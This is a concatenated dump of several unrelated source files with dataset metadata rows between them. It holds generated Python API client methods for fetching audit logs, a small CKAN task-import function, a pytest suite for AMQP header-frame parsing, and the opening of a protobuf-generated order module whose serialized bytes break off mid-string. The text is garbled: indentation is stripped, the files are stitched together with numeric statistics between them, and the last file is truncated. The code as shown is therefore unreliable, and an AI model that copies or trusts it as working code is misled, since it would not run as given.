all_params = ['customer_id', 'limit', 'start_time', 'end_time', 'asc_order', 'offset', 'action_types'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_id' is set
if ('customer_id' not in params or
params['customer_id'] is None):
raise ValueError("Missing the required parameter `customer_id` when calling `get_audit_logs_by_customer_id_using_get`") # noqa: E501
# verify the required parameter 'limit' is set
if ('limit' not in params or
params['limit'] is None):
raise ValueError("Missing the required parameter `limit` when calling `get_audit_logs_by_customer_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_id' in params:
path_params['customerId'] = params['customer_id'] # noqa: E501
query_params = []
if 'start_time' in params:
query_params.append(('startTime', params['start_time'])) # noqa: E501
if 'end_time' in params:
query_params.append(('endTime', params['end_time'])) # noqa: E501
if 'asc_order' in params:
query_params.append(('ascOrder', params['asc_order'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'action_types' in params:
query_params.append(('actionTypes', params['action_types'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/audit/logs/customer/{customerId}{?startTime,endTime,ascOrder,offset,actionTypes,limit}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimePageDataAuditLog', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_audit_logs_by_entity_id_using_get(self, entity_type, entity_id, limit, **kwargs): # noqa: E501
"""getAuditLogsByEntityId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_by_entity_id_using_get(entity_type, entity_id, limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_type: entityType (required)
:param str entity_id: entityId (required)
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_audit_logs_by_entity_id_using_get_with_http_info(entity_type, entity_id, limit, **kwargs) # noqa: E501
else:
(data) = self.get_audit_logs_by_entity_id_using_get_with_http_info(entity_type, entity_id, limit, **kwargs) # noqa: E501
return data
def get_audit_logs_by_entity_id_using_get_with_http_info(self, entity_type, entity_id, limit, **kwargs): # noqa: E501
"""getAuditLogsByEntityId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_by_entity_id_using_get_with_http_info(entity_type, entity_id, limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_type: entityType (required)
:param str entity_id: entityId (required)
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['entity_type', 'entity_id', 'limit', 'start_time', 'end_time', 'asc_order', 'offset', 'action_types'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'entity_type' is set
if ('entity_type' not in params or
params['entity_type'] is None):
raise ValueError("Missing the required parameter `entity_type` when calling `get_audit_logs_by_entity_id_using_get`") # noqa: E501
# verify the required parameter 'entity_id' is set
if ('entity_id' not in params or
params['entity_id'] is None):
raise ValueError("Missing the required parameter `entity_id` when calling `get_audit_logs_by_entity_id_using_get`") # noqa: E501
# verify the required parameter 'limit' is set
if ('limit' not in params or
params['limit'] is None):
raise ValueError("Missing the required parameter `limit` when calling `get_audit_logs_by_entity_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'entity_type' in params:
path_params['entityType'] = params['entity_type'] # noqa: E501
if 'entity_id' in params:
path_params['entityId'] = params['entity_id'] # noqa: E501
query_params = []
if 'start_time' in params:
query_params.append(('startTime', params['start_time'])) # noqa: E501
if 'end_time' in params:
query_params.append(('endTime', params['end_time'])) # noqa: E501
if 'asc_order' in params:
query_params.append(('ascOrder', params['asc_order'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'action_types' in params:
query_params.append(('actionTypes', params['action_types'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/audit/logs/entity/{entityType}/{entityId}{?startTime,endTime,ascOrder,offset,actionTypes,limit}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimePageDataAuditLog', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_audit_logs_by_user_id_using_get(self, user_id, limit, **kwargs): # noqa: E501
"""getAuditLogsByUserId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_by_user_id_using_get(user_id, limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: userId (required)
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_audit_logs_by_user_id_using_get_with_http_info(user_id, limit, **kwargs) # noqa: E501
else:
(data) = self.get_audit_logs_by_user_id_using_get_with_http_info(user_id, limit, **kwargs) # noqa: E501
return data
def get_audit_logs_by_user_id_using_get_with_http_info(self, user_id, limit, **kwargs): # noqa: E501
"""getAuditLogsByUserId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_by_user_id_using_get_with_http_info(user_id, limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: userId (required)
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user_id', 'limit', 'start_time', 'end_time', 'asc_order', 'offset', 'action_types'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'user_id' is set
if ('user_id' not in params or
params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `get_audit_logs_by_user_id_using_get`") # noqa: E501
# verify the required parameter 'limit' is set
if ('limit' not in params or
params['limit'] is None):
raise ValueError("Missing the required parameter `limit` when calling `get_audit_logs_by_user_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user_id' in params:
path_params['userId'] = params['user_id'] # noqa: E501
query_params = []
if 'start_time' in params:
query_params.append(('startTime', params['start_time'])) # noqa: E501
if 'end_time' in params:
query_params.append(('endTime', params['end_time'])) # noqa: E501
if 'asc_order' in params:
query_params.append(('ascOrder', params['asc_order'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'action_types' in params:
query_params.append(('actionTypes', params['action_types'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/audit/logs/user/{userId}{?startTime,endTime,ascOrder,offset,actionTypes,limit}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimePageDataAuditLog', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_audit_logs_using_get(self, limit, **kwargs): # noqa: E501
"""getAuditLogs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_using_get(limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_audit_logs_using_get_with_http_info(limit, **kwargs) # noqa: E501
else:
(data) = self.get_audit_logs_using_get_with_http_info(limit, **kwargs) # noqa: E501
return data
def get_audit_logs_using_get_with_http_info(self, limit, **kwargs): # noqa: E501
"""getAuditLogs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_using_get_with_http_info(limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['limit', 'start_time', 'end_time', 'asc_order', 'offset', 'action_types'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'limit' is set
if ('limit' not in params or
params['limit'] is None):
raise ValueError("Missing the required parameter `limit` when calling `get_audit_logs_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('startTime', params['start_time'])) # noqa: E501
if 'end_time' in params:
query_params.append(('endTime', params['end_time'])) # noqa: E501
if 'asc_order' in params:
query_params.append(('ascOrder', params['asc_order'])) # noqa: E501
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'action_types' in params:
query_params.append(('actionTypes', params['action_types'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/audit/logs{?startTime,endTime,ascOrder,offset,actionTypes,limit}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimePageDataAuditLog', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.061538
| 145
| 0.63085
| 2,686
| 22,392
| 4.98064
| 0.075949
| 0.050232
| 0.028704
| 0.026162
| 0.919719
| 0.9103
| 0.902676
| 0.902228
| 0.897518
| 0.876065
| 0
| 0.016322
| 0.272195
| 22,392
| 519
| 146
| 43.144509
| 0.804565
| 0.336593
| 0
| 0.784906
| 0
| 0.011321
| 0.227056
| 0.066359
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033962
| false
| 0
| 0.015094
| 0
| 0.098113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc0f404380d029e46caef93ca3d6c5dd3243d4ff
| 60
|
py
|
Python
|
modules/ckanext-ytp_tasks/ckanext/ytp_tasks/celery_import.py
|
eetumans/opendata
|
061f58550bcb820016a764cca4763ed0a5f627fe
|
[
"MIT"
] | 16
|
2018-07-12T14:26:02.000Z
|
2022-02-24T12:10:00.000Z
|
modules/ckanext-ytp_tasks/ckanext/ytp_tasks/celery_import.py
|
eetumans/opendata
|
061f58550bcb820016a764cca4763ed0a5f627fe
|
[
"MIT"
] | 751
|
2017-09-28T07:47:50.000Z
|
2022-03-31T12:08:25.000Z
|
modules/ckanext-ytp_tasks/ckanext/ytp_tasks/celery_import.py
|
vrk-kpa/opendata-ckan
|
8936e2d9e700b9e5534fe2a51eedc2d1ede8c10b
|
[
"MIT"
] | 6
|
2017-10-31T07:47:07.000Z
|
2021-10-06T07:09:07.000Z
|
def task_imports():
return ['ckanext.ytp_tasks.tasks']
| 15
| 38
| 0.7
| 8
| 60
| 5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 60
| 3
| 39
| 20
| 0.784314
| 0
| 0
| 0
| 0
| 0
| 0.389831
| 0.389831
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0.5
| 1.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
fc2c19fd9f8467ba2be4e72010983c06d641aaa1
| 8,389
|
py
|
Python
|
tests/unit/frames/header_frame_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/frames/header_frame_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/frames/header_frame_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Copyright (c) 2011-2015, Agora Games, LLC All rights reserved.
https://github.com/agoragames/haigha/blob/master/LICENSE.txt
'''
from chai import Chai
import struct
import time
from datetime import datetime
from haigha.frames import header_frame
from haigha.frames.header_frame import HeaderFrame
from haigha.reader import Reader
from haigha.writer import Writer
class HeaderFrameTest(Chai):
def test_type(self):
assert_equals(2, HeaderFrame.type())
def test_properties(self):
frame = HeaderFrame(42, 'class_id', 'weight', 'size', 'props')
assert_equals(42, frame.channel_id)
assert_equals('class_id', frame.class_id)
assert_equals('weight', frame.weight)
assert_equals('size', frame.size)
assert_equals('props', frame.properties)
def test_str(self):
# Don't bother checking the copy
frame = HeaderFrame(42, 5, 6, 7, 'props')
assert_equals('HeaderFrame[channel: 42, class_id: 5, weight: 6, size: 7, properties: props]',
str(frame))
def test_parse_fast_for_standard_properties(self):
bit_writer = Writer()
val_writer = Writer()
# strip ms because amqp doesn't include it
now = datetime.utcfromtimestamp(
long(time.mktime(datetime.now().timetuple())))
bit_field = 0
for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
bit_field = (bit_field << 1) | 1
if ptype == 'shortstr':
val_writer.write_shortstr(pname)
elif ptype == 'octet':
val_writer.write_octet(42)
elif ptype == 'timestamp':
val_writer.write_timestamp(now)
elif ptype == 'table':
val_writer.write_table({'foo': 'bar'})
bit_field <<= (16 - len(HeaderFrame.PROPERTIES))
bit_writer.write_short(bit_field)
header_writer = Writer()
header_writer.write_short(5)
header_writer.write_short(6)
header_writer.write_longlong(7)
payload = header_writer.buffer()
payload += bit_writer.buffer()
payload += val_writer.buffer()
reader = Reader(payload)
frame = HeaderFrame.parse(4, reader)
for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
if ptype == 'shortstr':
self.assertEquals(pname, frame.properties[pname])
elif ptype == 'octet':
self.assertEquals(42, frame.properties[pname])
elif ptype == 'timestamp':
self.assertEquals(now, frame.properties[pname])
elif ptype == 'table':
self.assertEquals({'foo': 'bar'}, frame.properties[pname])
assert_equals(4, frame.channel_id)
assert_equals(5, frame._class_id)
assert_equals(6, frame._weight)
assert_equals(7, frame._size)
def test_parse_slow_for_standard_properties(self):
HeaderFrame.DEFAULT_PROPERTIES = False
bit_writer = Writer()
val_writer = Writer()
# strip ms because amqp doesn't include it
now = datetime.utcfromtimestamp(
long(time.mktime(datetime.now().timetuple())))
bit_field = 0
for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
bit_field = (bit_field << 1) | 1
if ptype == 'shortstr':
val_writer.write_shortstr(pname)
elif ptype == 'octet':
val_writer.write_octet(42)
elif ptype == 'timestamp':
val_writer.write_timestamp(now)
elif ptype == 'table':
val_writer.write_table({'foo': 'bar'})
bit_field <<= (16 - len(HeaderFrame.PROPERTIES))
bit_writer.write_short(bit_field)
header_writer = Writer()
header_writer.write_short(5)
header_writer.write_short(6)
header_writer.write_longlong(7)
payload = header_writer.buffer()
payload += bit_writer.buffer()
payload += val_writer.buffer()
reader = Reader(payload)
frame = HeaderFrame.parse(4, reader)
HeaderFrame.DEFAULT_PROPERTIES = True
for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
if ptype == 'shortstr':
self.assertEquals(pname, frame.properties[pname])
elif ptype == 'octet':
self.assertEquals(42, frame.properties[pname])
elif ptype == 'timestamp':
self.assertEquals(now, frame.properties[pname])
elif ptype == 'table':
self.assertEquals({'foo': 'bar'}, frame.properties[pname])
assert_equals(4, frame.channel_id)
assert_equals(5, frame._class_id)
assert_equals(6, frame._weight)
assert_equals(7, frame._size)
def test_write_frame_fast_for_standard_properties(self):
bit_field = 0
properties = {}
now = datetime.utcfromtimestamp(
long(time.mktime(datetime.now().timetuple())))
for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
bit_field |= mask
if ptype == 'shortstr':
properties[pname] = pname
elif ptype == 'octet':
properties[pname] = 42
elif ptype == 'timestamp':
properties[pname] = now
elif ptype == 'table':
properties[pname] = {'foo': 'bar'}
frame = HeaderFrame(42, 5, 6, 7, properties)
buf = bytearray()
frame.write_frame(buf)
reader = Reader(buf)
assert_equals(2, reader.read_octet())
assert_equals(42, reader.read_short())
size = reader.read_long()
start_pos = reader.tell()
assert_equals(5, reader.read_short())
assert_equals(6, reader.read_short())
assert_equals(7, reader.read_longlong())
assert_equals(0b1111111111111100, reader.read_short())
for pname, ptype, rfunc, wfunc, mask in HeaderFrame.PROPERTIES:
if ptype == 'shortstr':
assertEquals(pname, reader.read_shortstr())
elif ptype == 'octet':
assertEquals(42, reader.read_octet())
elif ptype == 'timestamp':
assertEquals(now, reader.read_timestamp())
elif ptype == 'table':
assertEquals({'foo': 'bar'}, reader.read_table())
end_pos = reader.tell()
assert_equals(size, end_pos - start_pos)
assert_equals(0xce, reader.read_octet())
def test_write_frame_slow_for_standard_properties(self):
HeaderFrame.DEFAULT_PROPERTIES = False
bit_field = 0
properties = {}
now = datetime.utcfromtimestamp(
long(time.mktime(datetime.now().timetuple())))
for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
bit_field |= mask
if ptype == 'shortstr':
properties[pname] = pname
elif ptype == 'octet':
properties[pname] = 42
elif ptype == 'timestamp':
properties[pname] = now
elif ptype == 'table':
properties[pname] = {'foo': 'bar'}
frame = HeaderFrame(42, 5, 6, 7, properties)
buf = bytearray()
frame.write_frame(buf)
HeaderFrame.DEFAULT_PROPERTIES = True
reader = Reader(buf)
assert_equals(2, reader.read_octet())
assert_equals(42, reader.read_short())
size = reader.read_long()
start_pos = reader.tell()
assert_equals(5, reader.read_short())
assert_equals(6, reader.read_short())
assert_equals(7, reader.read_longlong())
assert_equals(0b1111111111111100, reader.read_short())
for pname, ptype, rfunc, wfunc, mask in HeaderFrame.PROPERTIES:
if ptype == 'shortstr':
assertEquals(pname, reader.read_shortstr())
elif ptype == 'octet':
assertEquals(42, reader.read_octet())
elif ptype == 'timestamp':
assertEquals(now, reader.read_timestamp())
elif ptype == 'table':
assertEquals({'foo': 'bar'}, reader.read_table())
end_pos = reader.tell()
assert_equals(size, end_pos - start_pos)
assert_equals(0xce, reader.read_octet())
| 36.473913
| 101
| 0.594469
| 911
| 8,389
| 5.288694
| 0.125137
| 0.07721
| 0.029058
| 0.044832
| 0.844956
| 0.834579
| 0.818182
| 0.818182
| 0.818182
| 0.818182
| 0
| 0.021136
| 0.295029
| 8,389
| 229
| 102
| 36.633188
| 0.793541
| 0.02837
| 0
| 0.858696
| 0
| 0.005435
| 0.048029
| 0
| 0
| 0
| 0.000983
| 0
| 0.255435
| 1
| 0.038043
| false
| 0
| 0.043478
| 0
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc47d5b66a5a988791e125c97e184356a89579e2
| 105,224
|
py
|
Python
|
example/src/order_stub/order_pb2.py
|
DDS-DS/pytest-grpc
|
a4df9263324fc584c1b4f4a796a2f8424dd56b2b
|
[
"MIT"
] | null | null | null |
example/src/order_stub/order_pb2.py
|
DDS-DS/pytest-grpc
|
a4df9263324fc584c1b4f4a796a2f8424dd56b2b
|
[
"MIT"
] | null | null | null |
example/src/order_stub/order_pb2.py
|
DDS-DS/pytest-grpc
|
a4df9263324fc584c1b4f4a796a2f8424dd56b2b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: order.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import order_review_pb2 as order__review__pb2
import order_settlement_pb2 as order__settlement__pb2
import code_pb2 as code__pb2
import settlement_pb2 as settlement__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='order.proto',
package='order',
syntax='proto3',
serialized_options=b'Z\027app/protocol/grpc/order',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\x0border.proto\x12\x05order\x1a\x12order_review.proto\x1a\x16order_settlement.proto\x1a\ncode.proto\x1a\x10settlement.proto\"r\n\x0eOrderCreateReq\x12\x0f\n\x07user_id\x18\x01 \x01(\t\x12\x10\n\x08username\x18\x02 \x01(\t\x12\x15\n\rbusiness_code\x18\x03 \x01(\t\x12&\n\x06orders\x18\x04 \x03(\x0b\x32\x16.order.OrderCreateInfo\"\xef\x02\n\x0fOrderCreateInfo\x12\x0f\n\x07\x63ountry\x18\x01 \x01(\t\x12\x12\n\norder_type\x18\x02 \x01(\t\x12/\n\x0border_items\x18\x03 \x03(\x0b\x32\x1a.order.OrderItemCreateInfo\x12\x18\n\x10logistics_amount\x18\x04 \x01(\x03\x12\x16\n\x0epayment_method\x18\x05 \x01(\t\x12.\n\x07\x61\x64\x64ress\x18\x06 \x01(\x0b\x32\x1d.order.OrderAddressCreateInfo\x12\x32\n\x06labels\x18\x07 \x03(\x0b\x32\".order.OrderCreateInfo.LabelsEntry\x12\x0e\n\x06remark\x18\x08 \x01(\t\x12\x31\n\tdiscounts\x18\t \x03(\x0b\x32\x1e.order.OrderDiscountCreateInfo\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"o\n\x13OrderItemCreateInfo\x12\x0f\n\x07item_id\x18\x01 \x01(\t\x12\x0e\n\x06spu_id\x18\x02 \x01(\t\x12\x0e\n\x06sku_id\x18\x03 \x01(\t\x12\x15\n\rbind_item_ids\x18\x04 \x03(\t\x12\x10\n\x08quantity\x18\x05 \x01(\x05\"\xcd\x01\n\x16OrderAddressCreateInfo\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06mobile\x18\x02 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x03 \x01(\t\x12\r\n\x05state\x18\x04 \x01(\t\x12\x0c\n\x04\x63ity\x18\x05 \x01(\t\x12\x10\n\x08\x64istrict\x18\x06 \x01(\t\x12\x0e\n\x06\x64\x65tail\x18\x07 \x01(\t\x12\x10\n\x08postcode\x18\x08 \x01(\t\x12\r\n\x05\x65mail\x18\t \x01(\t\x12\x0c\n\x04ward\x18\n \x01(\t\x12\x16\n\x0erecharge_phone\x18\x0b \x01(\t\"a\n\x17OrderDiscountCreateInfo\x12\x15\n\rdiscount_type\x18\x01 \x01(\t\x12/\n\rdiscount_info\x18\x02 \x01(\x0b\x32\x18.order.OrderDiscountInfo\"D\n\x11OrderDiscountInfo\x12\x0e\n\x06\x61mount\x18\x01 \x01(\x03\x12\x10\n\x08\x63urrency\x18\x02 \x01(\t\x12\r\n\x05value\x18\x03 \x01(\t\"c\n\x0fOrderListResult\x12\x1a\n\x04\x64\x61ta\x18\x01 \x03(\x0b\x32\x0c.order.Order\x12\r\n\x05total\x18\x02 \x01(\x03\x12\x18\n\x04\x63ode\x18\x03 \x01(\x0e\x32\n.code.Code\x12\x0b\n\x03msg\x18\x04 \x01(\t\"\x81\x01\n\x11OrderCreateResult\x12\x1c\n\x06orders\x18\x01 \x03(\x0b\x32\x0c.order.Order\x12\'\n\x06\x65rrors\x18\x02 \x03(\x0b\x32\x17.order.CreateOrderError\x12\x18\n\x04\x63ode\x18\x03 \x01(\x0e\x32\n.code.Code\x12\x0b\n\x03msg\x18\x04 \x01(\t\"<\n\x10\x43reateOrderError\x12\r\n\x05index\x18\x01 \x01(\x05\x12\x0c\n\x04\x63ode\x18\x02 \x01(\x05\x12\x0b\n\x03msg\x18\x03 \x01(\t\"\xef\x02\n\x16MerchantOrderCreateReq\x12\x18\n\x10\x63ustomer_user_id\x18\x01 \x01(\t\x12\x18\n\x10merchant_user_id\x18\x02 \x01(\t\x12\x15\n\rbusiness_code\x18\x03 \x01(\t\x12\x10\n\x08store_id\x18\x04 \x01(\t\x12\x0f\n\x07\x63ountry\x18\x05 \x01(\t\x12\x12\n\norder_type\x18\x06 \x01(\t\x12\x14\n\x0ctotal_amount\x18\x07 \x01(\x03\x12\x0e\n\x06remark\x18\x08 \x01(\t\x12\x39\n\x06labels\x18\t \x03(\x0b\x32).order.MerchantOrderCreateReq.LabelsEntry\x12\x31\n\tdiscounts\x18\n \x03(\x0b\x32\x1e.order.OrderDiscountCreateInfo\x12\x10\n\x08\x63urrency\x18\x0b \x01(\t\x1a-\n\x0bLabelsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t:\x02\x38\x01\"_\n\x19MerchantOrderCreateResult\x12\x18\n\x04\x63ode\x18\x01 \x01(\x0e\x32\n.code.Code\x12\x0b\n\x03msg\x18\x02 \x01(\t\x12\x1b\n\x05order\x18\x03 \x01(\x0b\x32\x0c.order.Order\"\xa2\x06\n\x05Order\x12\n\n\x02id\x18\x01 \x01(\t\x12\x0f\n\x07user_id\x18\x02 \x01(\t\x12\x12\n\norder_type\x18\x03 \x01(\t\x12\x0e\n\x06status\x18\x04 \x01(\t\x12\x14\n\x0ctotal_amount\x18\x06 \x01(\x03\x12\x14\n\x0citems_amount\x18\x07 \x01(\x03\x12\x18\n\x10logistics_amount\x18\x08 \x01(\x03\x12\x17\n\x0f\x64iscount_amount\x18\t \x01(\x03\x12\x10\n\x08\x63urrency\x18\n \x01(\t\x12\x0f\n\x07\x63ountry\x18\x0b \x01(\t\x12\x16\n\x0e\x66ulfill_method\x18\x0c \x01(\t\x12\x10\n\x08store_id\x18\r \x01(\t\x12+\n\x0breview_info\x18\x0e \x01(\x0b\x32\x16.order.OrderReviewInfo\x12\x15\n\rcancel_reason\x18\x10 \x01(\t\x12\x17\n\x0fplatform_remark\x18\x11 \x01(\t\x12\x15\n\rseller_remark\x18\x12 \x01(\t\x12\x13\n\x0buser_remark\x18\x13 \x01(\t\x12\x11\n\tcreate_at\x18\x14 \x01(\x03\x12\x11\n\tupdate_at\x18\x15 \x01(\x03\x12\x1f\n\x05items\x18\x16 